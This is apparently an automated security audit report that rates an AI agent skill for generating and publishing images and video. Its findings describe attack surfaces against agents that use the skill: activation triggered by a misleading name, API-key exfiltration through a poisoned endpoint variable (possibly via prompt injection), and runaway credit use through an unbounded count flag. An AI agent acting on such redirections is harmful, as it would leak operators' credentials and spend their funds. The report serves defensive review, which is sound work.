Is i54851498-gif/visual-studio-agent safe?

https://github.com/openclaw/skills/tree/main/skills/i54851498-gif/visual-studio-agent

83
SAFE

OpenFishy Feed Publisher is a transparently documented AI image/video generation and publishing skill with no prompt injection content, no sensitive file reads, and a clean installation procedure. Its primary risks are operational rather than adversarial: the misleading slug 'visual-studio-agent' could cause unintended agent activation when users mention the Microsoft IDE, every invocation transmits operator-provided API keys to three external services (fal.ai, OpenAI, and a Vercel endpoint), and the configurable VISUAL_STUDIO_API_URL creates a key-redirection attack surface if the operator environment is compromised. Canary files are intact and all data flows are fully disclosed in SKILL.md.

Category Scores

Prompt Injection 83/100 · 30%
Data Exfiltration 80/100 · 25%
Code Execution 78/100 · 20%
Clone Behavior 92/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 70/100 · 5%

Findings (8)

MEDIUM Misleading slug 'visual-studio-agent' creates unintended activation risk -17

The GitHub repository path slug and display name both use 'visual-studio-agent', which closely resembles Microsoft Visual Studio, a widely known IDE. An LLM agent that routes skills by name similarity could activate this skill when a user says 'open my Visual Studio project', 'run a Visual Studio build', or similar phrases, triggering fal.ai API calls and charges with no user intent. SKILL.md includes a disclaimer, but the slug is what agent routers parse first and embed in tool descriptions.

MEDIUM User prompts and media metadata transmitted to three external third-party services -15

Every generation cycle sends the constructed image/video prompt to fal.ai for model inference, optionally sends the same prompt plus the resulting image URL to OpenAI for quality scoring, and then sends the media URL, prompt, theme, tags, agent-profile, and idempotency key to the OpenFishy Vercel endpoint. All flows are disclosed in SKILL.md, but operators should understand that creative inputs leave the local environment on every invocation and are subject to fal.ai, OpenAI, and OpenFishy privacy policies.

MEDIUM VISUAL_STUDIO_API_URL override enables API key redirection to arbitrary endpoint -20

submit.py and publish_cycle.py read VISUAL_STUDIO_API_URL from the environment and transmit VISUAL_STUDIO_API_KEY as a Bearer token to whichever URL is configured. If this environment variable is poisoned — through a compromised operator environment, a malicious co-loaded skill that writes env vars, or prompt injection — every subsequent publish call exfiltrates the API key in the Authorization header of the redirected HTTP request. The default URL is benign, but the attack surface exists at the configuration layer.

LOW Bundled executable Python scripts make outbound network calls on invocation -22

Five Python scripts are included in the skill and make HTTP calls to three external services when executed. While all scripts require explicit operator invocation (no auto-run on install), an agent with shell-execution capability can trigger these calls in response to user requests that match the skill's trigger description. The scripts are stdlib-only and contain no obfuscation, but their presence means the skill introduces an outbound network attack surface that does not exist for documentation-only skills.

LOW Unbounded --count flag allows unmetered fal.ai API credit consumption -10

generate_and_publish.py accepts a --count argument with no enforced upper bound. If an adversarial user message or a looping agent invokes this script with a large count, or if the skill is triggered in a background loop, the operator's fal.ai quota could be exhausted without explicit per-call confirmation. No rate-limiting or budget enforcement is implemented within the skill.

LOW API credentials transmitted as plaintext Bearer tokens in HTTP Authorization headers -5

FAL_KEY is sent as 'Key {fal_key}' and VISUAL_STUDIO_API_KEY as 'Bearer {api_key}' in Authorization headers on every outbound request. While this is standard API authentication practice, the keys transit the network on each operation and will appear in server-side access logs at fal.ai and the OpenFishy Vercel endpoint. If TLS is compromised or logging is misconfigured at either endpoint, key exposure is possible.

INFO Clean sparse-checkout installation from public GitHub monorepo 0

Installation clones only the target skill subpath from the openclaw/skills GitHub monorepo using --depth 1 sparse checkout, then removes the temporary clone. No side-channel downloads, no package managers, no post-clone scripts. The installation procedure is fully auditable from the auditd EXECVE log.

INFO Canary file accesses confirmed as Oathe audit-framework operations, not skill code 0

inotifywait and auditd PATH records show .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCloud credentials opened at two points: timestamp 1771925484 (pre-install baseline by the audit framework) and 1771925502 (post-install canary integrity verification by the audit framework). No skill Python script contains file paths referencing these locations. All accesses are CLOSE_NOWRITE (read-only), confirming no modification. Canary integrity monitor confirms all files intact.